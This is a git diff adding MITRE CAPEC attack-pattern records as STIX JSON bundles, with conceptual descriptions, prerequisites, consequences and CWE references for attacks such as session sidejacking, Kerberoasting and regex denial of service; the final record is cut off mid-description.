newline at end of file diff --git a/capec/attack-pattern/attack-pattern--d08922ff-2566-4d0d-a098-3dfffaea3331.json b/capec/attack-pattern/attack-pattern--d08922ff-2566-4d0d-a098-3dfffaea3331.json new file mode 100644 index 0000000000..47c867357d --- /dev/null +++ b/capec/attack-pattern/attack-pattern--d08922ff-2566-4d0d-a098-3dfffaea3331.json @@ -0,0 +1,29 @@ +{ + "type": "bundle", + "id": "bundle--073fd7f0-5aaf-4de7-a2d3-42c620ba56ed", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--d08922ff-2566-4d0d-a098-3dfffaea3331", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "DEPRECATED: XSS through Log Files", + "description": "This attack pattern has been deprecated as it referes to an existing chain relationship between \"CAPEC-93 : Log Injection-Tampering-Forging\" and \"CAPEC-63 : Cross-Site Scripting\". Please refer to these CAPECs going forward.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/106.html", + "external_id": "CAPEC-106" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--d0d56d0e-30ee-4e60-9928-f44945c6e95a.json b/capec/attack-pattern/attack-pattern--d0d56d0e-30ee-4e60-9928-f44945c6e95a.json new file mode 100644 index 0000000000..de7c464b13 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--d0d56d0e-30ee-4e60-9928-f44945c6e95a.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--9431c8c8-8ea5-43f2-a75b-be76217cb3b1", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--d0d56d0e-30ee-4e60-9928-f44945c6e95a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Regular Expression Exponential Blowup", + "description": "An adversary may execute an attack on a program that uses a poor Regular Expression(Regex) implementation by choosing input that results in an extreme situation for the Regex. A typical extreme situation operates at exponential time compared to the input size. This is due to most implementations using a Nondeterministic Finite Automaton(NFA) state machine to be built by the Regex algorithm since NFA allows backtracking and thus more complex regular expressions. The algorithm builds a finite state machine and based on the input transitions through all the states until the end of the input is reached. NFA engines may evaluate each character in the input string multiple times during the backtracking. The algorithm tries each path through the NFA one by one until a match is found; the malicious input is crafted so every path is tried which results in a failure. Exploitation of the Regex results in programs hanging or taking a very long time to complete. These attacks may target various layers of the Internet due to regular expressions being used in validation.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/492.html", + "external_id": "CAPEC-492" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/400.html", + "external_id": "CWE-400" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Bryan Sullivan, Regular Expression Denial of Service Attacks and Defenses", + "url": "http://msdn.microsoft.com/en-au/magazine/ff646973.aspx", + "external_id": "REF-421" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_prerequisites": [ + "This type of an attack requires the ability to identify hosts running a poorly implemented Regex, and the ability to send crafted input to exploit the regular expression." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--d1885000-ba17-4c2d-a3ea-1e7bc473fe7a.json b/capec/attack-pattern/attack-pattern--d1885000-ba17-4c2d-a3ea-1e7bc473fe7a.json new file mode 100644 index 0000000000..01ead16b1c --- /dev/null +++ b/capec/attack-pattern/attack-pattern--d1885000-ba17-4c2d-a3ea-1e7bc473fe7a.json @@ -0,0 +1,89 @@ +{ + "type": "bundle", + "id": "bundle--720b4740-d76c-4461-8278-1de5eaa2270a", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--d1885000-ba17-4c2d-a3ea-1e7bc473fe7a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Session Sidejacking", + "description": "Session sidejacking takes advantage of an unencrypted communication channel between a victim and target system. The attacker sniffs traffic on a network looking for session tokens in unencrypted traffic. Once a session token is captured, the attacker performs malicious actions by using the stolen token with the targeted application to impersonate the victim. This attack is a specific method of session hijacking, which is exploiting a valid session token to gain unauthorized access to a target system or information. Other methods to perform a session hijacking are session fixation, cross-site scripting, or compromising a user or server machine and stealing the session token.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/102.html", + "external_id": "CAPEC-102" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/294.html", + "external_id": "CWE-294" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html", + "external_id": "CWE-522" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/523.html", + "external_id": "CWE-523" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/319.html", + "external_id": "CWE-319" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/614.html", + "external_id": "CWE-614" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Unreliable Execution" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_example_instances": [ + "The attacker and the victim are using the same WiFi public hotspot. When the victim connects to the hotspot, he has a hosted e-mail account open. This e-mail account uses AJAX on the client side which periodically asynchronously connects to the server side and transfers, amongst other things, the user's session token to the server. The communication is supposed to happen over HTTPS. However, the configuration in the public hotspot initially disallows the HTTPS connection (or any other connection) between the victim and the hosted e-mail servers because the victim first needs to register with the hotspot. The victim does so, but his e-mail client already defaulted to using a connection without HTTPS, since it was denied access the first time. Victim's session token is now flowing unencrypted between the victim's browser and the hosted e-mail servers. The attacker leverages this opportunity to capture the session token and gain access to the victim's hosted e-mail account." + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "An attacker and the victim are both using the same WiFi network.", + "The victim has an active session with a target system.", + "The victim is not using a secure channel to communicate with the target system (e.g. SSL, VPN, etc.)", + "The victim initiated communication with a target system that requires transfer of the session token or the target application uses AJAX and thereby periodically \"rings home\" asynchronously using the session token" + ], + "x_capec_resources_required": [ + "A packet sniffing tool, such as wireshark, can be used to capture session information." + ], + "x_capec_skills_required": { + "Low": "Easy to use tools exist to automate this attack." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--d1dc8643-ccf6-4261-b4a2-132e7929a537.json b/capec/attack-pattern/attack-pattern--d1dc8643-ccf6-4261-b4a2-132e7929a537.json new file mode 100644 index 0000000000..ac70680e58 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--d1dc8643-ccf6-4261-b4a2-132e7929a537.json @@ -0,0 +1,107 @@ +{ + "type": "bundle", + "id": "bundle--4581a9b0-a760-4dda-8114-b2469cf7533c", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--d1dc8643-ccf6-4261-b4a2-132e7929a537", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "User-Controlled Filename", + "description": "An attack of this type involves an adversary inserting malicious characters (such as a XSS redirection) into a filename, directly or indirectly that is then used by the target software to generate HTML text or other potentially executable content. Many websites rely on user-generated content and dynamically build resources like files, filenames, and URL links directly from user supplied data. In this attack pattern, the attacker uploads code that can execute in the client browser and/or redirect the client browser to a site that the attacker owns. All XSS attack payload variants can be used to pass and exploit these vulnerabilities.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/73.html", + "external_id": "CAPEC-73" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html", + "external_id": "CWE-20" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/184.html", + "external_id": "CWE-184" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/96.html", + "external_id": "CWE-96" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/348.html", + "external_id": "CWE-348" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/116.html", + "external_id": "CWE-116" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/350.html", + "external_id": "CWE-350" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/86.html", + "external_id": "CWE-86" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html", + "external_id": "CWE-697" + }, + { + "source_name": "reference_from_CAPEC", + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Alter Execution Logic" + ], + "Confidentiality": [ + "Gain Privileges", + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_example_instances": [ + "Phishing attacks rely on a user clicking on links on that are supplied to them by attackers masquerading as a trusted resource such as a bank or online auction site. The end user's email client hosts the supplied resource name in this case via email. The resource name, however may either 1) direct the client browser to a malicious site to steal credentials and/or 2) execute code on the client machine to probe the victim's host system and network environment." + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The victim must trust the name and locale of user controlled filenames." + ], + "x_capec_skills_required": { + "High": "Exploiting a client side vulnerability to inject malicious scripts into the browser's executable process.", + "Low": "To achieve a redirection and use of less trusted source, an attacker can simply edit data that the host uses to build the filename", + "Medium": "Deploying a malicious \"look-a-like\" site (such as a site masquerading as a bank or online auction site) that the user enters their authentication data into." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--d228b96e-9660-4986-8cf5-2a632c9f4baa.json b/capec/attack-pattern/attack-pattern--d228b96e-9660-4986-8cf5-2a632c9f4baa.json new file mode 100644 index 0000000000..48e2b940f6 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--d228b96e-9660-4986-8cf5-2a632c9f4baa.json @@ -0,0 +1,36 @@ +{ + "type": "bundle", + "id": "bundle--47e810d7-2072-4abc-980b-3f16175c6b36", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--d228b96e-9660-4986-8cf5-2a632c9f4baa", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-12-07T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Functionality Bypass", + "description": "An adversary attacks a system by bypassing some or all functionality intended to protect it. Often, a system user will think that protection is in place, but the functionality behind those protections has been disabled by the adversary.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/554.html", + "external_id": "CAPEC-554" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/424.html", + "external_id": "CWE-424" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Meta", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--d39afdc9-d913-4686-a5f8-e4ab56eec66e.json b/capec/attack-pattern/attack-pattern--d39afdc9-d913-4686-a5f8-e4ab56eec66e.json new file mode 100644 index 0000000000..2fba30b8fe --- /dev/null +++ b/capec/attack-pattern/attack-pattern--d39afdc9-d913-4686-a5f8-e4ab56eec66e.json @@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--cb02bcd0-b100-460c-b88b-833e36081bc0", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--d39afdc9-d913-4686-a5f8-e4ab56eec66e", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2019-04-04T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Kerberoasting", + "description": "Through the exploitation of how service accounts leverage Kerberos authentication with Service Principal Names (SPNs), the adversary obtains and subsequently cracks the hashed credentials of a service account target to exploit its privileges. The Kerberos authentication protocol centers around a ticketing system which is used to request/grant access to services and to then access the requested services. As an authenticated user, the adversary may request Active Directory and obtain a service ticket with portions encrypted via RC4 with the private key of the authenticated account. By extracting the local ticket and saving it disk, the adversary can brute force the hashed value to reveal the target account credentials.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/509.html", + "external_id": "CAPEC-509" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/552.html", + "external_id": "CWE-552" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Jeff Warren, Extracting Service Account Passwords with Kerberoasting, 2017--05---09", + "url": "https://blog.stealthbits.com/extracting-service-account-passwords-with-kerberoasting/", + "external_id": "REF-559" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_prerequisites": [ + "The adversary requires access as an authenticated user on the system. This attack pattern relates to elevating privileges.", + "The adversary requires use of a third-party credential harvesting tool (e.g., Mimikatz).", + "The adversary requires a brute force tool." + ], + "x_capec_skills_required": { + "Medium": "" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--d3ed3c67-fd28-49d1-b6a4-8d46b644ad8c.json b/capec/attack-pattern/attack-pattern--d3ed3c67-fd28-49d1-b6a4-8d46b644ad8c.json new file mode 100644 index 0000000000..2a7fed3d0e --- /dev/null +++ b/capec/attack-pattern/attack-pattern--d3ed3c67-fd28-49d1-b6a4-8d46b644ad8c.json @@ -0,0 +1,36 @@ +{ + "type": "bundle", + "id": "bundle--aedfab84-3ac5-47db-b2db-5f9453de2d73", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--d3ed3c67-fd28-49d1-b6a4-8d46b644ad8c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "File Manipulation", + "description": "An attacker modifies file contents or attributes (such as extensions or names) of files in a manner to cause incorrect processing by an application. Attackers use this class of attacks to cause applications to enter unstable states, overwrite or expose sensitive information, and even execute arbitrary code with the application's privileges. This class of attacks differs from attacks on configuration information (even if file-based) in that file manipulation causes the file processing to result in non-standard behaviors, such as buffer overflows or use of the incorrect interpreter. Configuration attacks rely on the application interpreting files correctly in order to insert harmful configuration information. Likewise, resource location attacks rely on controlling an application's ability to locate files, whereas File Manipulation attacks do not require the application to look in a non-default location, although the two classes of attacks are often combined.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/165.html", + "external_id": "CAPEC-165" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Meta", + "x_capec_prerequisites": [ + "The target must use the affected file without verifying its integrity." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack. In some cases, tools can be used to better control the response of the targeted application to the modified file." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--d454be12-6fcc-4ba0-a730-a07a29f71d36.json b/capec/attack-pattern/attack-pattern--d454be12-6fcc-4ba0-a730-a07a29f71d36.json new file mode 100644 index 0000000000..749d53e06e --- /dev/null +++ b/capec/attack-pattern/attack-pattern--d454be12-6fcc-4ba0-a730-a07a29f71d36.json @@ -0,0 +1,36 @@ +{ + "type": "bundle", + "id": "bundle--91c41494-dabd-402d-912d-0963d879bafe", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--d454be12-6fcc-4ba0-a730-a07a29f71d36", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Pretexting via Customer Service", + "description": "An adversary engages in pretexting behavior, assuming the role of someone who works for Customer Service, to solicit information from target persons, or manipulate the target into performing an action that serves the adversary's interests. One example of a scenario such as this would be to call an individual, articulate your false affiliation with a credit card company, and then attempt to get the individual to verify their credit card number.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/412.html", + "external_id": "CAPEC-412" + }, + { + "source_name": "reference_from_CAPEC", + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "url": "http://www.social-engineer.org", + "external_id": "REF-348" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--d45dd12b-2a90-40e8-8e17-4e1a5062117c.json b/capec/attack-pattern/attack-pattern--d45dd12b-2a90-40e8-8e17-4e1a5062117c.json new file mode 100644 index 0000000000..5282a37e17 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--d45dd12b-2a90-40e8-8e17-4e1a5062117c.json @@ -0,0 +1,73 @@ +{ + "type": "bundle", + "id": "bundle--443bfbfd-42e3-484d-a275-a9ab31b535d3", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--d45dd12b-2a90-40e8-8e17-4e1a5062117c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Reflection Attack in Authentication Protocol", + "description": "An attacker can abuse an authentication protocol susceptible to reflection attack in order to defeat it. Doing so allows the attacker illegitimate access to the target system, without possessing the requisite credentials. Reflection attacks are of great concern to authentication protocols that rely on a challenge-handshake or similar mechanism. An attacker can impersonate a legitimate user and can gain illegitimate access to the system by successfully mounting a reflection attack during authentication.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/90.html", + "external_id": "CAPEC-90" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/301.html", + "external_id": "CWE-301" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/303.html", + "external_id": "CWE-303" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/718.html", + "external_id": "CWE-718" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Confidentiality": [ + "Gain Privileges", + "Bypass Protection Mechanism", + "Read Data" + ] + }, + "x_capec_example_instances": [ + "\n A single sign-on solution for a network uses a fixed pre-shared key with its clients to initiate the sign-on process in order to avoid eavesdropping on the initial exchanges.\n An attacker can use a reflection attack to mimic a trusted client on the network to participate in the sign-on exchange.\n " + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The attacker must have direct access to the target server in order to successfully mount a reflection attack. An intermediate entity, such as a router or proxy, that handles these exchanges on behalf of the attacker inhibits the attackers' ability to attack the authentication protocol." + ], + "x_capec_resources_required": [ + "All that the attacker requires is a means to observe and understand the protocol exchanges in order to reflect the challenges appropriately." + ], + "x_capec_skills_required": { + "Medium": "The attacker needs to have knowledge of observing the protocol exchange and managing the required connections in order to issue and respond to challenges" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--d47faea4-b41f-494f-ab97-0e69b3029095.json b/capec/attack-pattern/attack-pattern--d47faea4-b41f-494f-ab97-0e69b3029095.json new file mode 100644 index 0000000000..c9af95c118 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--d47faea4-b41f-494f-ab97-0e69b3029095.json @@ -0,0 +1,110 @@ +{ + "type": "bundle", + "id": "bundle--de88babf-fef0-48c3-851c-ba461b558821", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--d47faea4-b41f-494f-ab97-0e69b3029095", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "Reusing Session IDs (aka Session Replay)", + "description": "This attack targets the reuse of valid session ID to spoof the target system in order to gain privileges. The attacker tries to reuse a stolen session ID used previously during a transaction to perform spoofing and session hijacking. Another name for this type of attack is Session Replay.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/60.html", + "external_id": "CAPEC-60" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/294.html", + "external_id": "CWE-294" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/290.html", + "external_id": "CWE-290" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html", + "external_id": "CWE-346" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/384.html", + "external_id": "CWE-384" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/488.html", + "external_id": "CWE-488" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/539.html", + "external_id": "CWE-539" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html", + "external_id": "CWE-200" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html", + "external_id": "CWE-285" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/664.html", + "external_id": "CWE-664" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/732.html", + "external_id": "CWE-732" + }, + { + "source_name": "reference_from_CAPEC", + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_example_instances": [ + "OpenSSL and SSLeay allow remote attackers to reuse SSL sessions and bypass access controls. See also: CVE-1999-0428", + "Merak Mail IceWarp Web Mail uses a static identifier as a user session ID that does not change across sessions, which could allow remote attackers with access to the ID to gain privileges as that user, e.g. by extracting the ID from the user's answer or forward URLs. See also: CVE-2002-0258" + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The target host uses session IDs to keep track of the users.", + "Session IDs are used to control access to resources.", + "The session IDs used by the target host are not well protected from session theft." + ], + "x_capec_skills_required": { + "Low": "If an attacker can steal a valid session ID, he can then try to be authenticated with that stolen session ID.", + "Medium": "More sophisticated attack can be used to hijack a valid session from a user and spoof a legitimate user by reusing his valid session ID." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--d4adf927-d379-42f9-9d89-0af5e6aa3f02.json b/capec/attack-pattern/attack-pattern--d4adf927-d379-42f9-9d89-0af5e6aa3f02.json new file mode 100644 index 0000000000..1593dad168 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--d4adf927-d379-42f9-9d89-0af5e6aa3f02.json @@ -0,0 +1,58 @@ +{ + "type": "bundle", + "id": "bundle--e55a5997-692e-44b9-80e7-9705d40903c4", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--d4adf927-d379-42f9-9d89-0af5e6aa3f02", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Signature Spoofing by Key Theft", + "description": "An attacker obtains an authoritative or reputable signer's private signature key by theft and then uses this key to forge signatures from the original signer to mislead a victim into performing actions that benefit the attacker.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/474.html", + "external_id": "CAPEC-474" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html", + "external_id": "CWE-522" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Sigbj\u00f8rn Vik, Security breach stopped, 2013--06---26, http://my.opera.com/securitygroup/blog/2013/06/26/opera-infrastructure-attack", + "external_id": "REF-411" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Patrick Morley, Bit9 and Our Customers\u2019 Security, 2013--02---08, https://blog.bit9.com/2013/02/08/bit9-and-our-customers-security/", + "external_id": "REF-412" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Brad Arkin, Inappropriate Use of Adobe Code Signing Certificate, 2012--09---27, http://blogs.adobe.com/asset/2012/09/inappropriate-use-of-adobe-code-signing-certificate.html", + "external_id": "REF-413" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "An authoritative or reputable signer is storing their private signature key with insufficient protection." + ], + "x_capec_skills_required": { + "High": "Ability to compromise systems containing sensitive data", + "Low": "Knowledge of common location methods and access methods to sensitive data" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--d712e4ad-9f92-4c75-8881-bc52439a588a.json b/capec/attack-pattern/attack-pattern--d712e4ad-9f92-4c75-8881-bc52439a588a.json new file mode 100644 index 0000000000..4c88a7889a --- /dev/null +++ b/capec/attack-pattern/attack-pattern--d712e4ad-9f92-4c75-8881-bc52439a588a.json @@ -0,0 +1,29 @@ +{ + "type": "bundle", + "id": "bundle--2337516f-23de-490a-8007-ddf74f763bf3", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--d712e4ad-9f92-4c75-8881-bc52439a588a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Obtain Data via Utilities", + "description": "This CAPEC has been deprecated because of is not directly related to a weakness, social engineering, supply chains, or a physical-based attack.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/567.html", + "external_id": "CAPEC-567" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_status": "Deprecated", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--d771faeb-8b5c-40fd-ae05-663a55c61fbf.json b/capec/attack-pattern/attack-pattern--d771faeb-8b5c-40fd-ae05-663a55c61fbf.json new file mode 100644 index 0000000000..bf5710b812 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--d771faeb-8b5c-40fd-ae05-663a55c61fbf.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--89029d6c-d6a3-45e5-8ccd-8d4aa7d87b4d", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--d771faeb-8b5c-40fd-ae05-663a55c61fbf", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Design Alteration", + "description": "An adversary modifies the design of a technology, product, or component to acheive a negative impact once the system is deployed. In this type of attack, the goal of the adversary is to modify the design of the system, prior to development starting, in such a way that the negative impact can be leveraged when the system is later deployed. Design alteration attacks differ from development alteration attacks in that design alteration attacks take place prior to development and which then may or may not be developed by the adverary. Design alteration attacks include modifying system designs to degrade system performance, cause unexpected states or errors, and general design changes that may lead to additional vulnerabilities. These attacks generally require insider access to modify design documents, but they may also be spoofed via web communications. The product is then 